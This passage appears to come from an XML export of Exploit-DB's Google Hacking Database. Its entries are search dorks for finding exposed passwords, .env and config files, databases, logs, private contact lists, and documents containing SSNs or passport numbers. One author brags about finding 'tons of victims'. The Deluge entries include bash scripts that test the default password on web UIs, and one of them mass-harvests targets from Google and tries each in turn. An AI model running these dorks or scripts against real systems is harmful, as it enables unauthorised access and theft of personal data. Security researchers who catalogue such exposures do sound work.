</entry>
<entry>
<id>3645</id>
<link>https://www.exploit-db.com/ghdb/3645</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:/xampp/security.php</shortDescription>
<textualDescription>XAMPP Security Setting Page Information Disclosure. Author: modpr0be</textualDescription>
<query>allinurl:/xampp/security.php</query>
<querystring>https://www.google.com/search?q=allinurl:/xampp/security.php</querystring>
<edb></edb>
<date>2010-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4680</id>
<link>https://www.exploit-db.com/ghdb/4680</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:awstats.pl?config=</shortDescription>
<textualDescription>Using this dork, one will be able to find the web statistics for the server
including who is visiting this site, which pages are frequented, error
codes and much more.
*Nishaanth Guna*
Security Researcher, *Appknox https://www.appknox.com/*</textualDescription>
<query>allinurl:awstats.pl?config=</query>
<querystring>https://www.google.com/search?q=allinurl:awstats.pl?config=</querystring>
<edb></edb>
<date>2018-02-22</date>
<author>Nishaanth Guna</author>
</entry>
<entry>
<id>1034</id>
<link>https://www.exploit-db.com/ghdb/1034</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:cdkey.txt</shortDescription>
<textualDescription>cdkeys</textualDescription>
<query>allinurl:cdkey.txt</query>
<querystring>https://www.google.com/search?q=allinurl%3Acdkey.txt</querystring>
<edb></edb>
<date>2005-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3715</id>
<link>https://www.exploit-db.com/ghdb/3715</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:http://www.google.co.in/latitude/apps/badge/api?user=</shortDescription>
<textualDescription>Site: google.com/latitude - This is a free application where you can track
your PC, laptop and mobile, just login there and you will be tracked
freely(used to track yourself live and you can put this in blogs to show
where you are)
I made a dork simply that shows some couple of people, after some years when
this application will grow stronger and you can get tons of victims.
*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*
By *The ALLSTAR*</textualDescription>
<query>allinurl:http://www.google.co.in/latitude/apps/badge/api?user=</query>
<querystring>https://www.google.com/search?q=allinurl:http://www.google.co.in/latitude/apps/badge/api?user=</querystring>
<edb></edb>
<date>2011-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6211</id>
<link>https://www.exploit-db.com/ghdb/6211</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:index.php?db=information_schema</shortDescription>
<textualDescription>Google Dork : allinurl:index.php?db=information_schema
Description :
This dork bypasses the admin username and password and takes you directly
to information schema table and you can delete data!
Author : Anjali
Linkedin Profile link : https://www.linkedin.com/in/anjali-p-44ab20133/
</textualDescription>
<query>allinurl:index.php?db=information_schema</query>
<querystring>https://www.google.com/search?q=allinurl:index.php?db=information_schema</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Anjali Kashyap</author>
</entry>
<entry>
<id>7524</id>
<link>https://www.exploit-db.com/ghdb/7524</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:index.php?page= site:.gov.in</shortDescription>
<textualDescription># Google Dork: allinurl:index.php?page= site:.gov.in
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: MD. Rimel</textualDescription>
<query>allinurl:index.php?page= site:.gov.in</query>
<querystring>https://www.google.com/search?q=allinurl:index.php?page= site:.gov.in</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>MD. Rimel</author>
</entry>
<entry>
<id>4725</id>
<link>https://www.exploit-db.com/ghdb/4725</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:mc4wp-debug.log ext:log</shortDescription>
<textualDescription>Dork: Mail Chimp log.
Enjoy.
Dork by Rootkit Pentester!.
</textualDescription>
<query>allinurl:mc4wp-debug.log ext:log</query>
<querystring>https://www.google.com/search?q=allinurl:mc4wp-debug.log ext:log</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>170</id>
<link>https://www.exploit-db.com/ghdb/170</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:servlet/SnoopServlet</shortDescription>
<textualDescription>These pages reveal server information such as port, server software version, server name, full paths, etc.</textualDescription>
<query>allinurl:servlet/SnoopServlet</query>
<querystring>https://www.google.com/search?q=allinurl%3Aservlet%2FSnoopServlet</querystring>
<edb></edb>
<date>2004-04-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4832</id>
<link>https://www.exploit-db.com/ghdb/4832</link>
<category>Files Containing Juicy Info</category>
<shortDescription>AndroidManifest ext:xml -github -gitlab -googlesource</shortDescription>
<textualDescription>AndroidManifest ext:xml -github -gitlab -googlesource
AndroidManifest.xml files
ManhNho
</textualDescription>
<query>AndroidManifest ext:xml -github -gitlab -googlesource</query>
<querystring>https://www.google.com/search?q=AndroidManifest ext:xml -github -gitlab -googlesource</querystring>
<edb></edb>
<date>2018-05-29</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8303</id>
<link>https://www.exploit-db.com/ghdb/8303</link>
<category>Files Containing Juicy Info</category>
<shortDescription>AWS Cloud Hosted Login Pages</shortDescription>
<textualDescription># Google Dork: AWS Cloud Hosted Login Pages
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: Prathamesh Kamble</textualDescription>
<query>AWS Cloud Hosted Login Pages</query>
<querystring>https://www.google.com/search?q=AWS Cloud Hosted Login Pages</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Prathamesh Kamble</author>
</entry>
<entry>
<id>8129</id>
<link>https://www.exploit-db.com/ghdb/8129</link>
<category>Files Containing Juicy Info</category>
<shortDescription>BroadBand Device Webserver</shortDescription>
<textualDescription># Google Dork: BroadBand Device Webserver
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Shx</textualDescription>
<query>BroadBand Device Webserver</query>
<querystring>https://www.google.com/search?q=BroadBand Device Webserver</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Shx</author>
</entry>
<entry>
<id>4740</id>
<link>https://www.exploit-db.com/ghdb/4740</link>
<category>Files Containing Juicy Info</category>
<shortDescription>CakePHP filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</shortDescription>
<textualDescription>This dork allow you to specific find file contains Username,
Password, Secret Keys and allows you to search for sql configuration file.
Thanks
Arya Usha
</textualDescription>
<query>CakePHP filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</query>
<querystring>https://www.google.com/search?q=CakePHP filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</querystring>
<edb></edb>
<date>2018-04-03</date>
<author>Arya Usha</author>
</entry>
<entry>
<id>72</id>
<link>https://www.exploit-db.com/ghdb/72</link>
<category>Files Containing Juicy Info</category>
<shortDescription>cgiirc.conf</shortDescription>
<textualDescription>CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!</textualDescription>
<query>intitle:index.of cgiirc.config</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex%2Eof+cgiirc%2Econfig%27</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>73</id>
<link>https://www.exploit-db.com/ghdb/73</link>
<category>Files Containing Juicy Info</category>
<shortDescription>cgiirc.conf</shortDescription>
<textualDescription>This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!</textualDescription>
<query>inurl:cgiirc.config</query>
<querystring>https://www.google.com/search?q=inurl%3A%27cgiirc.config%27</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>8186</id>
<link>https://www.exploit-db.com/ghdb/8186</link>
<category>Files Containing Juicy Info</category>
<shortDescription>CMS Made Simple &lt; 2.2.10 - SQL Injection</shortDescription>
<textualDescription># Google Dork: CMS Made Simple &lt; 2.2.10 - SQL Injection
# Files Containing Juicy Info
# Date:16/05/2023
# Exploit Author: Daniele Scanu</textualDescription>
<query>CMS Made Simple &lt; 2.2.10 - SQL Injection</query>
<querystring>https://www.google.com/search?q=CMS Made Simple &lt; 2.2.10 - SQL Injection</querystring>
<edb></edb>
<date>2023-05-16</date>
<author>Daniele Scanu</author>
</entry>
<entry>
<id>4726</id>
<link>https://www.exploit-db.com/ghdb/4726</link>
<category>Files Containing Juicy Info</category>
<shortDescription>config.yaml intitle:&quot;index of&quot; vagrantfile</shortDescription>
<textualDescription>Juicy info from puppet
Bruno Schmid
</textualDescription>
<query>config.yaml intitle:&quot;index of&quot; vagrantfile</query>
<querystring>https://www.google.com/search?q=config.yaml intitle:&quot;index of&quot; vagrantfile</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4962</id>
<link>https://www.exploit-db.com/ghdb/4962</link>
<category>Files Containing Juicy Info</category>
<shortDescription>configuration&gt; + filetype:config -github.com</shortDescription>
<textualDescription>web.config file
ManhNho
</textualDescription>
<query>configuration&gt; + filetype:config -github.com</query>
<querystring>https://www.google.com/search?q=configuration&gt; + filetype:config -github.com</querystring>
<edb></edb>
<date>2018-09-24</date>
<author>ManhNho</author>
</entry>
<entry>
<id>1079</id>
<link>https://www.exploit-db.com/ghdb/1079</link>
<category>Files Containing Juicy Info</category>
<shortDescription>contacts ext:wml</shortDescription>
<textualDescription>Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the &quot;SIG&quot; details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!</textualDescription>
<query>contacts ext:wml</query>
<querystring>https://www.google.com/search?q=contacts+ext%3Awml+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>373</id>
<link>https://www.exploit-db.com/ghdb/373</link>
<category>Files Containing Juicy Info</category>
<shortDescription>data filetype:mdb -site:gov -site:mil</shortDescription>
<textualDescription>Microsoft Access databases containing all kinds of 'data'.</textualDescription>
<query>data filetype:mdb -site:gov -site:mil</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=data+filetype%3Amdb+-site%3Agov+-site%3Amil</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6524</id>
<link>https://www.exploit-db.com/ghdb/6524</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin</shortDescription>
<textualDescription>Dorks: Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin
Summary:
A Google dork that gives the PHPMyAdmin creates table information
configutation.
--
Thanks &amp; Regards,
Prasad Lingamaiah
</textualDescription>
<query>Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin</query>
<querystring>https://www.google.com/search?q=Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin</querystring>
<edb></edb>
<date>2020-09-07</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>7830</id>
<link>https://www.exploit-db.com/ghdb/7830</link>
<category>Files Containing Juicy Info</category>
<shortDescription>db_password filetype:env</shortDescription>
<textualDescription># Google Dork: db_password filetype:env
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Thiru kumaran</textualDescription>
<query>db_password filetype:env</query>
<querystring>https://www.google.com/search?q=db_password filetype:env</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Thiru kumaran</author>
</entry>
<entry>
<id>5622</id>
<link>https://www.exploit-db.com/ghdb/5622</link>
<category>Files Containing Juicy Info</category>
<shortDescription>db_password filetype:env -site:github.com -git</shortDescription>
<textualDescription># Google Dork : db_password filetype:env -site:github.com -git
# Category : File contains Juicy items
# Date : 05-11-2019
# Author : Dhaiwat Mehta
</textualDescription>
<query>db_password filetype:env -site:github.com -git</query>
<querystring>https://www.google.com/search?q=db_password filetype:env -site:github.com -git</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Dhaiwat Mehta</author>
</entry>
<entry>
<id>5255</id>
<link>https://www.exploit-db.com/ghdb/5255</link>
<category>Files Containing Juicy Info</category>
<shortDescription>DB_USERNAME filetype:env</shortDescription>
<textualDescription># Exploit Title: Laravel Environment Configuration
# Google Dork: DB_USERNAME filetype:env
# Author: Francis Al Victoriano
</textualDescription>
<query>DB_USERNAME filetype:env</query>
<querystring>https://www.google.com/search?q=DB_USERNAME filetype:env</querystring>
<edb></edb>
<date>2019-06-17</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4741</id>
<link>https://www.exploit-db.com/ghdb/4741</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Deluge - Web UI (BitTorrent Client - Download/Upload/Seed/Control/File Explorer) v1+v2</shortDescription>
<textualDescription>GoogleDork v1 ~ `intitle:&quot;Deluge: Web UI 1.3&quot; `
GoogleDork v2 ~ `intitle:&quot;Deluge: Web UI 1.3&quot; Filters. Status; Details; Files; Peers; Options. Downloaded: Uploaded:`
Default password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
Default port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
- - -
## Bash
```
url=&quot;http://target.com:8112/json&quot;
pass=&quot;deluge&quot;
req=$( curl \
-s \
--header 'Content-Type: application/json' \
--data '{&quot;method&quot;:&quot;auth.login&quot;,&quot;params&quot;:[&quot;'${pass}'&quot;],&quot;id&quot;:1}' \
--compressed \
&quot;${url}&quot; )
echo ${req} | grep -q '&quot;result&quot;: true' \
&amp;&amp; echo 'w000h000!' \
|| echo 'b00'
```
- - -
## Aut0PWN3r
//brew install googler//
```
googler \
--count 999 \
--unfilter \
--json \
--noprompt \
'intitle:&quot;Deluge: Web UI 1.3&quot; -exploit -vulnerability' \
| awk -F'&quot;' '/&quot;url&quot;/ {print $4}' \
&gt; /tmp/results.txt
for x in $( cat /tmp/results.txt ); do
curl \
-s \
--header 'Content-Type: application/json' \
--data '{&quot;method&quot;:&quot;auth.login&quot;,&quot;params&quot;:[&quot;deluge&quot;],&quot;id&quot;:1}' \
--compressed \
--max-time 5 \
&quot;${x}/json&quot; \
| grep -q true \
&amp;&amp; echo &quot;[*] w000h000! ~ ${x}&quot; \
|| echo &quot;[-] b00 ~ ${x}&quot;
done
```
- - -
## Other Work
- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/
- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/
- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/
</textualDescription>
<query>intitle:&quot;Deluge: Web UI 1.3&quot;</query>
<querystring>https://www.google.com/?q=intitle:&quot;Deluge: Web UI 1.3&quot;</querystring>
<edb></edb>
<date>2018-04-03</date>
<author>Pancaker</author>
</entry>
<entry>
<id>4742</id>
<link>https://www.exploit-db.com/ghdb/4742</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Deluge - Web UI (BitTorrent Client - Download/Upload/Seed/Control/File Explorer) v3</shortDescription>
<textualDescription>GoogleDork v3 ~ intitle:&quot;Deluge: Web UI&quot; inurl:&quot;:8112&quot;
Default password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
Default port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
- - -
## Bash
```
url=&quot;http://target.com:8112/json&quot;
pass=&quot;deluge&quot;
req=$( curl -s &quot;${url}&quot; \
-H 'Content-Type: application/json' \
--data-binary '{&quot;method&quot;:&quot;auth.login&quot;,&quot;params&quot;:[&quot;'${pass}'&quot;],&quot;id&quot;:1}' \
--compressed )
echo ${req} | grep -q '&quot;result&quot;: true' \
&amp;&amp; echo 'w000h000!' \
|| echo 'b00'
```
- - -
## Other Work
- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/
- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/
- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/
</textualDescription>
<query>intitle:&quot;Deluge: Web UI&quot; inurl:&quot;:8112&quot;</query>
<querystring>https://www.google.com/?q=intitle:&quot;Deluge: Web UI&quot; inurl:&quot;:8112&quot;</querystring>
<edb></edb>
<date>2018-04-03</date>
<author>Pancaker</author>
</entry>
<entry>
<id>8072</id>
<link>https://www.exploit-db.com/ghdb/8072</link>
<category>Files Containing Juicy Info</category>
<shortDescription>DHDB - GOOGLE DORK</shortDescription>
<textualDescription># Google Dork: index.of conf.php
# Files Containing Juicy Info
# Date:21/02/2023
# Exploit Author: Ishaq Mahmud</textualDescription>
<query>DHDB - GOOGLE DORK</query>
<querystring>https://www.google.com/search?q=DHDB - GOOGLE DORK</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Ishaq Mahmud</author>
</entry>
<entry>
<id>5260</id>
<link>https://www.exploit-db.com/ghdb/5260</link>
<category>Files Containing Juicy Info</category>
<shortDescription>docs.google.com/document</shortDescription>
<textualDescription>- `site:https://docs.google.com/document/d/ password`
- `site:https://docs.google.com/document/d/ password email`
- `site:https://docs.google.com/document/d/ username`
- `site:https://docs.google.com/document/d/ ssn`
- `site:https://docs.google.com/document/d/ passport number` </textualDescription>
<query>site:https://docs.google.com/document/d/ password</query>
<querystring>https://www.google.com?q=site:https://docs.google.com/document/d/ password</querystring>
<edb></edb>
<date>2019-06-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5259</id>
<link>https://www.exploit-db.com/ghdb/5259</link>
<category>Files Containing Juicy Info</category>
<shortDescription>docs.google.com/spreadsheets</shortDescription>
<textualDescription>- `site:https://docs.google.com/spreadsheets/d/ password`
- `site:https://docs.google.com/spreadsheets/d/ password email`
- `site:https://docs.google.com/spreadsheets/d/ username`
- `site:https://docs.google.com/spreadsheets/d/ ssn`
- `site:https://docs.google.com/spreadsheets/d/ passport number` </textualDescription>
<query>site:https://docs.google.com/spreadsheets/d/ password</query>
<querystring>https://www.google.com?q=site:https://docs.google.com/spreadsheets/d/ password</querystring>
<edb></edb>
<date>2019-06-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>6230</id>
<link>https://www.exploit-db.com/ghdb/6230</link>
<category>Files Containing Juicy Info</category>
<shortDescription>DORK : intext:&quot;index of&quot; &quot;var/log/&quot;</shortDescription>
<textualDescription>Dork : intext:&quot;index of&quot; &quot;var/log/&quot;
Description: This Google dork shows juicy information about different logs
used by the website. Logs like connector.log, debug log,system.log,
exception.log, etc
Thanks and regards
Anil Tom
</textualDescription>
<query>DORK : intext:&quot;index of&quot; &quot;var/log/&quot;</query>
<querystring>https://www.google.com/search?q=DORK : intext:&quot;index of&quot; &quot;var/log/&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Anil Tom</author>
</entry>
<entry>
<id>8138</id>
<link>https://www.exploit-db.com/ghdb/8138</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Dork Submission</shortDescription>
<textualDescription># Google Dork: index of: admin.json
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Ahmed Morve</textualDescription>
<query>Dork Submission</query>
<querystring>https://www.google.com/search?q=Dork Submission</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Ahmed Morve</author>
</entry>
<entry>
<id>8088</id>
<link>https://www.exploit-db.com/ghdb/8088</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Dork wp-config.bak - Exploit Title: intext: &quot;index of&quot; &quot;wp-config.php.bak&quot;</shortDescription>
<textualDescription># Google Dork: Dork wp-config.bak - Exploit Title: intext: &quot;index of&quot; &quot;wp-config.php.bak&quot;
# Files Containing Juicy Info
# Date:27/02/2023
# Exploit Author: NeoInvasor</textualDescription>
<query>Dork wp-config.bak - Exploit Title: intext: &quot;index of&quot; &quot;wp-config.php.bak&quot;</query>
<querystring>https://www.google.com/search?q=Dork wp-config.bak - Exploit Title: intext: &quot;index of&quot; &quot;wp-config.php.bak&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>NeoInvasor</author>
</entry>
<entry>
<id>4724</id>
<link>https://www.exploit-db.com/ghdb/4724</link>
<category>Files Containing Juicy Info</category>
<shortDescription>dwsync.xml intitle:index of -gitlab -github</shortDescription>
<textualDescription>Dreamweaver sync file which sometimes gives aways paths and names of
sensitive files
Bruno Schmid
</textualDescription>
<query>dwsync.xml intitle:index of -gitlab -github</query>
<querystring>https://www.google.com/search?q=dwsync.xml intitle:index of -gitlab -github</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4907</id>
<link>https://www.exploit-db.com/ghdb/4907</link>
<category>Files Containing Juicy Info</category>
<shortDescription>employee &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx</shortDescription>
<textualDescription>This will give you a good insight of the targets BOS(Business Operation
Software) and sometimes their supply chain.
also try:
newcomer &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx
hr | admin &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx
1st level support &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx
|xlsx
suppervisor &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx
engineer &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx
You can also replace &quot;training&quot; with &quot;exercise&quot; or &quot;education&quot;
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>employee &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx</query>
<querystring>https://www.google.com/search?q=employee &quot;training&quot; intitle:index.of ext:doc | pdf | xls |docx |xlsx</querystring>
<edb></edb>
<date>2018-08-07</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>317</id>
<link>https://www.exploit-db.com/ghdb/317</link>
<category>Files Containing Juicy Info</category>
<shortDescription>exported email addresses</shortDescription>
<textualDescription>Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.</textualDescription>
<query>e-mail address filetype:csv csv</query>
<querystring>https://www.google.com/search?q=e-mail+address+filetype%3Acsv+csv</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1047</id>
<link>https://www.exploit-db.com/ghdb/1047</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:&quot;budget approved&quot;) inurl:confidential</shortDescription>
<textualDescription>Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information.</textualDescription>
<query>ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:&quot;budget approved&quot;) inurl:confidential</query>
<querystring>https://www.google.com/search?q=ext:(doc+%7C+pdf+%7C+xls+%7C+txt+%7C+ps+%7C+rtf+%7C+odt+%7C+sxw+%7C+psw+%7C+ppt+%7C+pps+%7C+xml)+(intext:confidential+salary+%7C+intext:%22budget+approved%22)+inurl:confidential</querystring>
<edb></edb>
<date>2005-07-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6762</id>
<link>https://www.exploit-db.com/ghdb/6762</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential</shortDescription>
<textualDescription>Dork: ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential
Category : Files Containing Juicy Info
Author: Naved Shaikh
</textualDescription>
<query>ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential</query>
<querystring>https://www.google.com/search?q=ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential</querystring>
<edb></edb>
<date>2021-01-26</date>
<author>Naved Shaikh</author>
</entry>
<entry>
<id>4781</id>
<link>https://www.exploit-db.com/ghdb/4781</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:adr adr filetype:adr &quot;bookmarks.adr&quot;</shortDescription>
<textualDescription>Dorks containing Opera bookmarks, some with juicy info.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>ext:adr adr filetype:adr &quot;bookmarks.adr&quot;</query>
<querystring>https://www.google.com/search?q=ext:adr adr filetype:adr &quot;bookmarks.adr&quot;</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4588</id>
<link>https://www.exploit-db.com/ghdb/4588</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:asax</shortDescription>
<textualDescription>*Summary:*
A Google dork that gives the information about target .NET web application
and source code.
*Dork discovered by:*
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>ext:asax</query>
<querystring>https://www.google.com/search?q=ext:asax</querystring>
<edb></edb>
<date>2017-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>428</id>
<link>https://www.exploit-db.com/ghdb/428</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:asp inurl:pathto.asp</shortDescription>
<textualDescription>The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.&quot;This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\0E5\goldenstateeng.xxx\webThe path to your Site is -- D:\inetpub\wwwroot\01xx738\mc10s9izz</textualDescription>
<query>ext:asp inurl:pathto.asp</query>
<querystring>https://www.google.com/search?q=ext%3Aasp+inurl%3Apathto.asp</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>957</id>
<link>https://www.exploit-db.com/ghdb/957</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:ccm ccm -catacomb</shortDescription>
<textualDescription>Lotus cc:Mail Mailbox file</textualDescription>
<query>ext:ccm ccm -catacomb</query>
<querystring>https://www.google.com/search?q=ext:ccm+ccm+-catacomb</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>956</id>
<link>https://www.exploit-db.com/ghdb/956</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:CDX CDX</shortDescription>
<textualDescription>Visual FoxPro database index</textualDescription>
<query>ext:CDX CDX</query>
<querystring>https://www.google.com/search?q=ext:CDX+CDX&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5825</id>
<link>https://www.exploit-db.com/ghdb/5825</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:cfg tac_plus.cfg</shortDescription>
<textualDescription># Google Dork: ext:cfg tac_plus.cfg
# By using this dork, admin passwords and much more, in configuration files
can be found.
# Date: 21/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:cfg tac_plus.cfg</query>
<querystring>https://www.google.com/search?q=ext:cfg tac_plus.cfg</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>680</id>
<link>https://www.exploit-db.com/ghdb/680</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:cgi inurl:editcgi.cgi inurl:file=</shortDescription>
<textualDescription>This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php</textualDescription>
<query>ext:cgi inurl:editcgi.cgi inurl:file=</query>
<querystring>https://www.google.com/search?q=ext%3Acgi+inurl%3Aeditcgi.cgi+inurl%3Afile%3D</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>775</id>
<link>https://www.exploit-db.com/ghdb/775</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:conf inurl:rsyncd.conf -cvs -man</shortDescription>
<textualDescription>rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to &quot;rsync servers&quot; which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths</textualDescription>
<query>ext:conf inurl:rsyncd.conf -cvs -man</query>
<querystring>https://www.google.com/search?q=ext:conf+inurl:rsyncd.conf+-cvs+-man&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>659</id>
<link>https://www.exploit-db.com/ghdb/659</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:conf NoCatAuth -cvs</shortDescription>
<textualDescription>NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes.</textualDescription>
<query>ext:conf NoCatAuth -cvs</query>
<querystring>https://www.google.com/search?q=ext:conf+NoCatAuth+-cvs&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4581</id>
<link>https://www.exploit-db.com/ghdb/4581</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:csproj</shortDescription>
<textualDescription>*Summary:*
A Google dork that gives the information about the IIS configurations,
referenced libraries and all included file paths in server (.cs files etc)
from the target .NET web application.
*Dork discovered by:*
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>ext:csproj</query>
<querystring>https://www.google.com/search?q=ext:csproj</querystring>
<edb></edb>
<date>2017-09-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>766</id>
<link>https://www.exploit-db.com/ghdb/766</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:dat bpk.dat</shortDescription>
<textualDescription>Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version.</textualDescription>
<query>ext:dat bpk.dat</query>
